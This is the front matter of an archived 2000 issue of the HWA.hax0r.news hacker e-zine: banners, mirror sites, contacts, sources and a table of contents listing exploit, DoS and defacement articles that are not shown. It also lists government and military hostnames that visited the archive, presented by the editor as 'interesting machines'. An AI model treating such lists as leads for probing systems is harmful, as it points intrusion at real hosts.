gemini - kennedy.gemi.dev

💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn49.… captured on 2021-12-04 at 18:04:22.

View Raw

More Information

-=-=-=-=-=-=-

[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA 2000=] Number 49 Volume 2 Issue 1 1999 Jan 2000
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/

NEW YEAR EDITION:

This is #49 covering Dec 26th to Jan 15th

==========================================================================
_ ___ ___ ____ ___ ___ ___
| | | \ \ / / \ |___ \ / _ \ / _ \ / _ \
| |_| |\ \ /\ / / _ \ __) | | | | | | | | | |
| _ | \ V V / ___ \ / __/| |_| | |_| | |_| |
|_| |_| \_/\_/_/ \_\_____|\___/ \___/ \___/

_ _ _ _ __ __ _
| || |__ _ _ __ _ __ _ _| \| |_____ __ _\ \ / /__ __ _ _ _| |
| __ / _` | '_ \ '_ \ || | .` / -_) V V /\ V / -_) _` | '_|_|
|_||_\__,_| .__/ .__/\_, |_|\_\___|\_/\_/ |_|\___\__,_|_| (_)
|_| |_| |__/

"Providing news archives of recent events into the new millennium..."

==========================================================================

"ABUSUS NON TOLLIT USUM"

==========================================================================

Mailing list members: 20 New members over Xmas, we're now at 496.

Can we bump this up somewhat? spread the word!

==========================================================================

Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...

_ _ _
| | | | ___ | |_
| |_| |/ _ \| __|
| _ | (_) | |_
|_| |_|\___/ \__|
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/

.gov and .mil activity

fitzgerald.ags.bnl.gov
zephyr1.pnl.gov
ihvideo.lewisham.gov.uk
shihonage.gsfc.nasa.gov
burnia.dmz.health.nsw.gov.au
ococ.oc.ca.gov
guardian.gov.sg
aragorn.dpa.act.gov.au
ipaccess.gov.ru
eagle-ts222.korea.army.mil
gate1.noc.usmc.mil
eagle-ts209.korea.army.mil
proxy.vandenberg.af.mil
lax.dcmdw.dla.mil
beowulf.ramstein.af.mil
cofcs71.aphis.usda.gov
samds4.sam.pentagon.mil
eg-016-045.eglin.af.mil
pacfa.evepier.navy.mil
obgate.hill.af.mil
biglost.inel.gov
marshall.state.gov
flatline.arc.nasa.gov
mars.istac.gov
gateway1.osd.mil
gateway3.osd.mil
elan5172.cbcph.navy.mil
proxy.gintic.gov.sg
doegate.doe.gov
sunspot.gsfc.nasa.gov
gate1.mcbh.usmc.mil
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
mc1926.mcclellan.af.mil
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com

There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good Is It Worth It Followup to see
our boys keeping up with the news... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

_ ___ ___ _ ___
| | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____
| |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
| _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \
|_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

____ _ _ _ ____ _ __ __
/ ___| ___ _ __ __ _| |_ ___| |__ __ _ _ __ __| / ___| _ __ (_)/ _|/ _|
\___ \ / __| '__/ _` | __/ __| '_ \ / _` | '_ \ / _` \___ \| '_ \| | |_| |_
___) | (__| | | (_| | || (__| | | | (_| | | | | (_| |___) | | | | | _| _|
|____/ \___|_| \__,_|\__\___|_| |_|\__,_|_|_|_|\__,_|____/|_| |_|_|_| |_|
/ ___| _ __ ___ ___(_) __ _| | |
\___ \| '_ \ / _ \/ __| |/ _` | | |
___) | |_) | __/ (__| | (_| | |_|
|____/| .__/ \___|\___|_|\__,_|_(_)
|_|

PRINT OUT THIS ISSUE ON YOUR CORPORATE PRINTER OR DADDY'S PRINTER WHEN HE
ISN'T LOOKING (IT'S KINDA BIG) OR JUST PRINT THIS SECTION OUT WITH A
SCREEN CAPTURE AND SCRATCH THE #'S FOR A GREAT SURPRISE!

##########################################################################
####################################_#####################################
###################################| |####################################
##################################/ __)###################################
##################################\_ \####################################
##################################( /###################################
###################################|_|####################################
##########################################################################
##########################################################################
##########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

http://welcome.to/HWA.hax0r.news/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

_ _ _ _ _____ _ _ _
| | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___
| |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __|
| _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__
|_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___|

Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.

Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.

This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

_____ _ _ _
| ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _
| |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
| _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| |
|_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
|___/

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.

I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed

BTW if anyone can suggest a better editor than UEDIT for
this thing send me some email i'm finding it lacking in
certain areas. Must be able to produce standard ascii.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

__ __ _
| \/ (_)_ __ _ __ ___ _ __ ___
| |\/| | | '__| '__/ _ \| '__/ __|
| | | | | | | | | (_) | | \__ \
|_| |_|_|_| |_| \___/|_| |___/

New mirror sites

*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***
http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/

* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.

*** Most likely to be up to date other than the main site.

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.

It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>

@HWA

=-----------------------------------------------------------------------=

Welcome to HWA.hax0r.news ...

=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi... /join #HWA.hax0r.news on EFnet.

**************************************************************************

"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf

____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|

Eris Free Net #HWA.hax0r.news

**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************

=--------------------------------------------------------------------------=

_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/

=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. www.2600.com, jokers to the end?.................................
04.0 .. More irc4all proxies.............................................
05.0 .. Simple Windows Dos using common tools and UDP....................
06.0 .. Slash interviews website defacer/cracker Fuqrag..................
07.0 .. Interview with sSh member YTcracker .............................
08.0 .. Interview with gH member Mosthated...............................
09.0 .. Mosthated/gH advisory Jan 10th 2000..............................
10.0 .. HNN's 1999 Year In Review 12/26/99..............................
11.0 .. 16th CCC Congress opens Monday in Berlin 12/26/99................
12.0 .. Canadian Youth Held for Cyber Ransom 12/26/99...................
13.0 .. Poulsen's List of Gifts to Get a Hacker 12/26/99................
14.0 .. More FUD About Cyberterrosists and Y2K 12/26/99.................
15.0 .. The Datacore Encryption Suite 1.0 Released on Christmas 12/26/99.
16.0 .. One Third of UK Vulnerable to Online Attack 12/27/99............
17.0 .. Grades Changed at NY School 12/27/99.............................
18.0 .. Cops Wanted, Hackers Need Not Apply 12/27/99.....................
19.0 .. IDS Signature Database Open to the Public 12/27/99...............
20.0 .. InfoSecurity 1999 Year in Review 12/27/99........................
21.0 .. Butchered From Inside 7 12/27/99.................................
22.0 .. DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit
12/28/99
23.0 .. Web Based CGI Vulnerability Scanner Released 12/28/99............
24.0 .. L0pht Interviewed by Slashdot 12/28/99...........................
25.0 .. AirForce to Close Web Sites Over Y2K 12/28/99....................
26.0 .. Sweden Plans Cyber Defense and Attack Force 12/28/99.............
27.0 .. DVD Industry Files Lawsuit Over DeCSS 12/29/99...................
28.0 .. No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99....
29.0 .. Pentagon and Others Take Air Force Lead and Shut Down Sites
12/29/99
30.0 .. More from CCC Congress in Germany 12/29/99.......................
31.0 .. Apple Patches OS 9 Security Hole 12/29/99........................
32.0 .. The need for physical security - Securing the OpenBSD console
12/29/99
33.0 .. New Era: Buffer Overflow Article by evenprime 01/03/00...........
34.0 .. Gangly Mentality, Y2K hype by ytcracker 01/03/00.................
35.0 .. "Scene Whores" By Eric Parker/Mind Security 01/03/00.............
36.0 .. DVD Control Association Looses First Round 01/03/00..............
37.0 .. First Viruses of the New Year Discovered 01/03/00................
38.0 .. Reports from Chaos Computer Congress 01/03/00....................
39.0 .. Gateway Sells Amiga 01/03/00.....................................
40.0 .. CIH Author Hired by Taiwanese Company 01/03/00...................
41.0 .. Body-Scanners Used by US Customs 01/03/00........................
42.0 .. Defacements Continue Unabated in the New Year 01/03/00...........
43.0 .. WebTV Hole Causes Spam 01/04/00..................................
44.0 .. Vandalism or Hactivism? 01/04/00.................................
45.0 .. No Longer Worried About Y2K Feds Look to Security 01/04/00.......
46.0 .. Interview With Richard Smith 01/04/00............................
47.0 .. Interview with Adam Penenberg 01/04/00...........................
48.0 .. KISA Discovers Y2K Bug 01/04/00..................................
49.0 .. Sprint Says 'Area 51' Does Exist 01/04/00........................
50.0 .. Spoofing your HTTP referrer .....................................
51.0 .. OSALL removed from the net. 01/13/00.............................
52.0 .. $10,000 USD up for grabs in PSS Storm Chaser 2000 white paper....
53.0 .. Bill Gates hands over CEO hat to Steve Ballmer...................
54.0 .. First Windows 2000 virus found...................................
55.0 .. InterNIC domain name hijacking: "It happens".....................
56.0 .. "A well known but overlooked threat to Hackers: Themselves"......
57.0 .. The complete guide to hax0ring. .................................
58.0 .. FAA Systems Vulnerable Due to Y2K Fixes 01/05/00.................
59.0 .. Internal Employees Greatest Threat Says New Study 01/05/00.......
60.0 .. Are the Greatest Risks Internal or External? 01/05/00............
61.0 .. Japanese Firms Turn To Security After Y2K 01/05/00...............
62.0 .. Virus FUD Continues 01/05/00.....................................
63.0 .. L0pht Merges With @Stake, Receives Funding 01/06/00..............
64.0 .. Offensive Cyberwar Capabilities Taking Shape 01/06/00............
65.0 .. Army Criticized By Judge On Lack of Security 01/06/00............
66.0 .. FAA Responds to Allegations 01/06/00.............................
67.0 .. Electronic Intruder released with Fine and No Jail 01/06/00......
68.0 .. PalmCrack 1.0 Released 01/06/00..................................
69.0 .. Radio Pirates (criminals) Steal Police Airwaves 01/06/00.........
70.0 .. ParseTV has Abruptly Canceled 01/07/00...........................
71.0 .. Finland Authorities Solve Massive Computer Crime Case 01/07/00...
72.0 .. The EPA Cracks Down On Security 01/07/00.........................
73.0 .. FBI Still Investigating Y2K Cyber Threats 01/07/00...............
74.0 .. Clinton Wants Increased Computer Security 01/07/00...............
75.0 .. Interview with Lloyd's of London and RailTrack Defacer 01/07/00..
76.0 .. Pac Bell Hit by Possible Cyber Intruder 01/10/00.................
77.0 .. Virgin ISP Issues New Passwords 01/10/00.........................
78.0 .. CD Universe Customer Info Compromised 01/10/00...................
79.0 .. Northwest Notifies Customers of Security Breech 01/10/00.........
80.0 .. Parse Issues Statement About Cancellation 01/10/00...............
81.0 .. HACK.CO.ZA DoS attack forces ISP to remove site..................
82.0 .. Comments on Linux Security 01/10/00..............................
83.0 .. PirateCity.com Wins Domain Battle with FortuneCity.com 01/10/00..
84.0 .. Taiwan Claims 1000 Viruses In Arsenal 01/10/00...................
85.0 .. Reno Announces LawNet 01/11/00...................................
86.0 .. Domains Redirected 01/11/00......................................
87.0 .. Report on SuperComputer Sale to China Released 01/11/00..........
88.0 .. Kevin Mitnick Interview 01/11/00.................................
89.0 .. Encryption Keys Easily Found On Systems 01/11/00.................
90.0 .. Buffer Overflow: Reform the AV Industry 01/11/00.................
91.0 .. China Registering Businesses to Monitor the Net 01/12/00.........
92.0 .. CD Universe Thief Threatens to Post more CC Numbers 01/12/00.....
93.0 .. Army Plans on DMZs for Its Networks 01/12/00.....................
94.0 .. CBS Alters On Air Images During News 01/12/00....................
95.0 .. Direct TV Service Stolen in Illinois 01/12/00....................
96.0 .. Security Book Released on Net for Free 01/12/00..................
97.0 .. States Can't Sell Private Info 01/14/00..........................
98.0 .. Mitnick Free Next Friday 01/14/00................................
99.0 .. Internet Banned From Jewish Homes 01/14/00.......................
100.0 .. NJ Teens Steal CC Numbers 01/14/00...............................
101.0 .. Radius Net takes over Attrition Mirrors 01/14/00.................
102.0 .. New Ezines Available 01/14/00....................................
103.0 .. FBI to Beef Up CyberCrime Investigation Abilities 01/15/00.......
104.0 .. UDP Called For Against @Home 01/15/00............................
105.0 .. ACPM Changes Name and Stops Intrusions 01/15/00..................
106.0 .. GCHQ Wants a Few Good Cryptographers 01/15/00....................
107.0 .. Internet Intoxication Used as Defense 01/15/00...................
108.0 .. Blacksun's Unix Security for Newbies version 1.0, 21/11/99.......
109.0 .. Where are the exploits and advisories??..........................

=-------------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................

Hey You!........................................................
=------=........................................................

Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................

SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................

=--------------------------------------------------------------------------=

@HWA'99, 2000

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.] HWA/DoK Since 1989

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.

Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Other methods:

Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news

@HWA

00.2 Sources ***
~~~~~~~~~~~

____
/ ___| ___ _ _ _ __ ___ ___ ___
\___ \ / _ \| | | | '__/ __/ _ Y __|
___) | (_) | |_| | | | (_| __|__ \
|____/ \___/ \__,_|_| \___\___|___/

Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ s
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>

___
| _ \___ ______ _ _ _ _ __ ___ ___
| / -_|_-< _ \ || | '_/ _/ -_|_-<
|_|_\___/__|___/\_,_|_| \__\___/__/

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PLEASE if you have any changes or additions for this section please
mail them to cruciphux@dok.org. Thank you.

http://www.cnn.com/SEARCH/

http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0

http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack

http://www.ottawacitizen.com/business/

http://search.yahoo.com.sg/search/news_sg?p=hack

http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack

http://www.zdnet.com/zdtv/cybercrime/

http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.

http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm

http://freespeech.org/eua/ Electronic Underground Affiliation

http://ech0.cjb.net ech0 Security

http://axon.jccc.net/hir/ Hackers Information Report

http://net-security.org Net Security

http://www.403-security.org Daily news and security related site

http://www.hack.co.za/ Current exploits archive

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

____ _ _ _
/ ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___
\___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
